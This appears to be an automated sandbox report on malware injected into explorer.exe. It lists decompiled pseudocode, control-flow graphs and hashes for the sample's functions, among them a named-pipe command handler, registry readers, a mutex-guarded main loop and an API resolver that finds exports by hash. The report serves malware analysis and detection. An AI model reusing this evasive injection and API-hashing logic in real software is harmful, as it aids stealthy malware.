        control_flow_graph 428 c32a1-c32b4 429 c32b7-c32ce ConnectNamedPipe 428->429 430 c32d0-c32db GetLastError 429->430 431 c32e1-c3304 429->431 430->431 432 c34c2-c34c8 430->432 434 c34a8 GetLastError 431->434 435 c330a-c330e 431->435 436 c34ae-c34bc DisconnectNamedPipe 434->436 435->434 437 c3314-c3320 435->437 436->429 436->432 438 c33b8-c33d1 call c93be 437->438 439 c3326-c3329 437->439 450 c3476-c349b call c96ca 438->450 451 c33d7-c33dd 438->451 441 c332b-c332f 439->441 442 c3397-c33b3 call cc319 439->442 443 c337b-c3384 call cf79f 441->443 444 c3331-c3334 441->444 442->436 460 c3358-c335b 443->460 447 c3365-c3369 call cf79f 444->447 448 c3336-c3339 444->448 464 c336e-c3376 447->464 453 c334f-c3353 call cf7c1 448->453 454 c333b-c333e 448->454 468 c349d-c34a6 call cc319 450->468 457 c33df-c33f6 call c8604 451->457 458 c3454-c346f call c9749 call c1da0 451->458 453->460 454->436 461 c3344-c334d call cf7c1 454->461 477 c33f8-c33fd 457->477 478 c3471 457->478 458->450 469 c335d-c3363 460->469 470 c3386-c3388 460->470 461->464 464->468 468->436 474 c338a-c3392 call cc319 469->474 470->474 474->436 483 c33ff-c3402 477->483 484 c342a-c3452 call c9749 call c1da0 call c94b7 477->484 481 c3473 478->481 481->450 485 c3404-c3425 call cc379 call c91a6 483->485 484->481 496 c3427 485->496 496->484
        C-Code - Quality: 54%
        			E000C32A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0xde684; // 0x64f8f0
					_push(0x80000);
					_push( *0xde724);
					_push( *0xde674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0xde724; // 0x2680020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E000C8604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000C94B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0xde724; // 0x2680020
							E000C96CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E000CC319(_t108);
								 *0xde758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E000CF79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E000CF79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E000CF7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E000CC319(_t109);
										} else {
											if(_t76 == 1) {
												E000CF7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E000CC319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0xde674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































        0x000c32ac
        0x000c32ae
        0x000c32b0
        0x000c32b4
        0x000c32b7
        0x000c32c3
        0x000c32ce
        0x00000000
        0x00000000
        0x000c32e1
        0x000c32e5
        0x000c32e6
        0x000c32eb
        0x000c32f0
        0x000c32f6
        0x000c3304
        0x000c34a8
        0x000c3314
        0x000c3314
        0x000c331d
        0x000c3320
        0x000c33c8
        0x000c33ca
        0x000c33d1
        0x000c33d7
        0x000c33dd
        0x000c3456
        0x000c3461
        0x000c3466
        0x000c3469
        0x000c33df
        0x000c33e2
        0x000c33ee
        0x000c33f0
        0x000c33f6
        0x000c3471
        0x000c33f8
        0x000c33fd
        0x000c33ff
        0x000c3402
        0x000c3404
        0x000c3412
        0x000c3417
        0x000c341a
        0x000c341b
        0x000c3420
        0x000c3423
        0x000c3427
        0x000c3427
        0x000c342c
        0x000c3439
        0x000c343e
        0x000c3441
        0x000c344d
        0x000c344d
        0x000c3473
        0x000c3473
        0x000c33dd
        0x000c3476
        0x000c348a
        0x000c348f
        0x000c349a
        0x000c349b
        0x00000000
        0x000c3326
        0x000c3326
        0x000c3329
        0x000c3397
        0x000c3398
        0x000c339b
        0x000c339c
        0x000c33a3
        0x000c33ae
        0x000c33b0
        0x000c332b
        0x000c332c
        0x000c332f
        0x000c337f
        0x00000000
        0x000c3331
        0x000c3331
        0x000c3334
        0x000c3369
        0x00000000
        0x000c3336
        0x000c3336
        0x000c3339
        0x000c3353
        0x000c3358
        0x000c335b
        0x000c3386
        0x000c3387
        0x000c3388
        0x000c335d
        0x000c335d
        0x000c3360
        0x000c3361
        0x000c3361
        0x000c338a
        0x000c338b
        0x000c333b
        0x000c333e
        0x000c3348
        0x000c336e
        0x000c336e
        0x000c3373
        0x000c3374
        0x000c349d
        0x000c349d
        0x000c349e
        0x000c34a3
        0x000c34a3
        0x000c333e
        0x000c3339
        0x000c3334
        0x000c332f
        0x000c3329
        0x000c3320
        0x000c34b4
        0x000c34bc
        0x00000000
        0x00000000
        0x00000000
        0x000c34bc
        0x000c34c8

        APIs
        • ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
        • GetLastError.KERNEL32 ref: 000C32D0
          • Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001E4), ref: 000CC35F
        • DisconnectNamedPipe.KERNEL32 ref: 000C34B4
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
        • String ID:
        • API String ID: 2389948835-0
        • Opcode ID: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
        • Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
        • Opcode Fuzzy Hash: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
        • Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 498 cb012-cb079 memset * 2 SHGetFolderPathW call cb946 501 cb07c-cb07e 498->501 502 cb0ab-cb0dd call cc392 lstrcpynW 501->502 503 cb080-cb094 call cbb8d 501->503 503->502 508 cb096-cb0a7 503->508 508->502
        C-Code - Quality: 87%
        			E000CB012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0xde698; // 0x64fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E000CB946(_t39);
				_t26 =  *0xde6b8; // 0x64fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0xde688; // 0xf0000
					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0xde698; // 0x64fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
				return 1;
			}
















        0x000cb012
        0x000cb023
        0x000cb035
        0x000cb037
        0x000cb045
        0x000cb054
        0x000cb05f
        0x000cb067
        0x000cb074
        0x000cb07a
        0x000cb07e
        0x000cb080
        0x000cb094
        0x000cb09d
        0x000cb0a8
        0x000cb0a8
        0x000cb094
        0x000cb0ab
        0x000cb0b2
        0x000cb0d0
        0x000cb0dd

        APIs
        • memset.MSVCRT ref: 000CB037
        • memset.MSVCRT ref: 000CB045
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F
          • Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
          • Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
          • Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
        • String ID:
        • API String ID: 3158470084-0
        • Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
        • Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
        • Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
        • Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 510 cbf37-cbf66 RegOpenKeyExW 511 cbf6c-cbf8a RegQueryValueExW 510->511 512 cbf68-cbf6a 510->512 514 cbf8c-cbf9c call c8604 511->514 515 cbfc7-cbfca 511->515 513 cbfda-cbfdc 512->513 514->515 521 cbf9e-cbfb8 RegQueryValueExW 514->521 517 cbfcc-cbfd1 515->517 518 cbfd7 515->518 517->518 520 cbfd9 518->520 520->513 522 cbfdd-cbfea RegCloseKey 521->522 523 cbfba-cbfc6 call c861a 521->523 522->520 523->515
        C-Code - Quality: 100%
        			E000CBF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0xde68c; // 0x64fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E000C8604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E000C861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










        0x000cbf55
        0x000cbf58
        0x000cbf5b
        0x000cbf66
        0x000cbf8a
        0x000cbfc7
        0x000cbfca
        0x000cbfcc
        0x000cbfd4
        0x000cbfd4
        0x000cbfd7
        0x000cbfd9
        0x00000000
        0x000cbfd9
        0x000cbf94
        0x000cbf96
        0x000cbf9c
        0x00000000
        0x00000000
        0x000cbfb8
        0x000cbfe5
        0x000cbfe8
        0x00000000
        0x000cbfe8
        0x000cbfc0
        0x00000000
        0x000cbfc6
        0x00000000

        APIs
        • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
        • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
        • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
        • RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
        • Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
        • Opcode Fuzzy Hash: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
        • Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 526 cbe9b-cbec3 RegOpenKeyExA 527 cbec9-cbee6 RegQueryValueExA 526->527 528 cbec5-cbec7 526->528 530 cbee8-cbef7 call c8604 527->530 531 cbf21-cbf24 527->531 529 cbf33-cbf36 528->529 530->531 536 cbef9-cbf13 RegQueryValueExA 530->536 533 cbf26-cbf2e RegCloseKey 531->533 534 cbf31 531->534 533->534 534->529 536->531 537 cbf15-cbf1a 536->537 537->531 538 cbf1c-cbf1f 537->538 538->531
        C-Code - Quality: 100%
        			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E000C8604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








        0x000cbeae
        0x000cbeb8
        0x000cbebb
        0x000cbec3
        0x00000000
        0x000cbec5
        0x000cbecc
        0x000cbee6
        0x000cbef2
        0x000cbef7
        0x000cbf15
        0x000cbf1a
        0x000cbf1f
        0x000cbf1f
        0x000cbf1a
        0x000cbef7
        0x000cbf24
        0x000cbf2e
        0x000cbf2e
        0x00000000

        APIs
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0064FC18,00000000,?,00000002), ref: 000CBEBE
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
        • RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
        • Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
        • Opcode Fuzzy Hash: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
        • Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5631, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 78%
        			E000C5631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E000C9E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E000C980C(0xde6c8);
					_t39 = 0x37; // executed
					E000C9F06(_t39);
					_t11 =  *0xde688; // 0xf0000
					_t40 = 0x3a; // executed
					E000C9F06(_t40); // executed
					E000CE4C1(_t63);
					_t14 =  *0xde688; // 0xf0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0xde684; // 0x64f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
					 *0xde74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0xde76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E000C8604(0x1000);
							_t52 = 0;
							 *0xde770 = _t34;
							_t49 =  *0xde774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0xde774 = _t41; // executed
						}
						E000C153B(_t41, _t52); // executed
						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
						E000C3017(); // executed
						E000C31C2(0, __eflags); // executed
						E000C29B1(); // executed
						E000C3BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0xde758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E000C980C(0xde750);
							_push(0xde750);
							_push(0xde750); // executed
							E000C279B();
							Sleep(0xfa0);
						}
						E000C3D34();
						E000C9A8E();
						E000C34CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E000C2DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















        0x000c5631
        0x000c563d
        0x000c5646
        0x000c5651
        0x000c5656
        0x000c5669
        0x000c566a
        0x000c566f
        0x000c567f
        0x000c5680
        0x000c5688
        0x000c568d
        0x000c5692
        0x000c569c
        0x000c569f
        0x000c56a9
        0x000c56b1
        0x000c56b7
        0x000c56be
        0x000c56d0
        0x000c56d6
        0x000c56db
        0x000c56dd
        0x000c56e4
        0x000c56e9
        0x000c56eb
        0x000c56f1
        0x000c56f7
        0x000c56f9
        0x000c56f9
        0x000c56fc
        0x000c56fc
        0x000c5702
        0x000c5710
        0x000c5717
        0x000c571c
        0x000c5721
        0x000c5726
        0x000c5750
        0x000c5750
        0x000c5756
        0x00000000
        0x00000000
        0x000c5732
        0x000c5737
        0x000c5738
        0x000c5739
        0x000c574a
        0x000c574a
        0x000c5758
        0x000c575d
        0x000c5762
        0x000c5767
        0x000c5767
        0x00000000
        0x00000000
        0x00000000
        0x000c5648
        0x000c5648
        0x000c564d
        0x000c564f
        0x000c56c0
        0x000c56c2
        0x00000000
        0x00000000
        0x00000000
        0x000c564f
        0x000c576d

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • Sleep.KERNELBASE(00000FA0), ref: 000C574A
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Time$CreateFileMutexSleepSystem
        • String ID: cYNa
        • API String ID: 1795067453-1073062283
        • Opcode ID: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
        • Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
        • Opcode Fuzzy Hash: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
        • Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CDFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 589 cdfad-cdfc4 590 cdfc6-cdfee 589->590 591 ce021 589->591 590->591 592 cdff0-ce013 call cc379 call cd400 590->592 593 ce023-ce027 591->593 598 ce028-ce03f 592->598 599 ce015-ce01f 592->599 600 ce095-ce097 598->600 601 ce041-ce049 598->601 599->591 599->592 600->593 601->600 602 ce04b 601->602 603 ce04d-ce053 602->603 604 ce055-ce057 603->604 605 ce063-ce074 603->605 604->605 606 ce059-ce061 604->606 607 ce079-ce085 LoadLibraryA 605->607 608 ce076-ce077 605->608 606->603 606->605 607->591 609 ce087-ce091 GetProcAddress 607->609 608->607 609->591 610 ce093 609->610 610->593
        C-Code - Quality: 100%
        			E000CDFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























        0x000cdfb6
        0x000cdfb8
        0x000cdfbb
        0x000cdfbe
        0x000cdfc4
        0x000ce021
        0x00000000
        0x000ce021
        0x000cdfc6
        0x000cdfd1
        0x000cdfd4
        0x000cdfd9
        0x000cdfde
        0x000cdfe1
        0x000cdfe3
        0x000cdfe6
        0x000cdfe9
        0x000cdfee
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000cdff0
        0x000cdff0
        0x000ce002
        0x000ce00f
        0x000ce013
        0x00000000
        0x00000000
        0x000ce015
        0x000ce018
        0x000ce019
        0x000ce01f
        0x00000000
        0x00000000
        0x00000000
        0x000ce01f
        0x000ce036
        0x000ce03b
        0x000ce03f
        0x00000000
        0x000ce04b
        0x000ce04b
        0x000ce04d
        0x000ce04d
        0x000ce053
        0x00000000
        0x00000000
        0x000ce059
        0x000ce05d
        0x000ce061
        0x00000000
        0x00000000
        0x00000000
        0x000ce061
        0x000ce067
        0x000ce06f
        0x000ce074
        0x000ce077
        0x000ce077
        0x000ce079
        0x000ce07d
        0x000ce085
        0x00000000
        0x00000000
        0x000ce089
        0x000ce091
        0x00000000
        0x00000000
        0x00000000
        0x000ce091

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
        • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA911, Relevance: 4.6, APIs: 3, Instructions: 74processCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 611 ca911-ca941 memset 612 ca94c-ca971 CreateProcessW 611->612 613 ca943-ca948 611->613 614 ca9ae 612->614 615 ca973-ca976 612->615 613->612 618 ca9b0-ca9b6 614->618 616 ca978-ca988 615->616 617 ca996-ca9ac 615->617 616->617 621 ca98a-ca990 GetExitCodeProcess 616->621 617->618 621->617
        C-Code - Quality: 66%
        			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
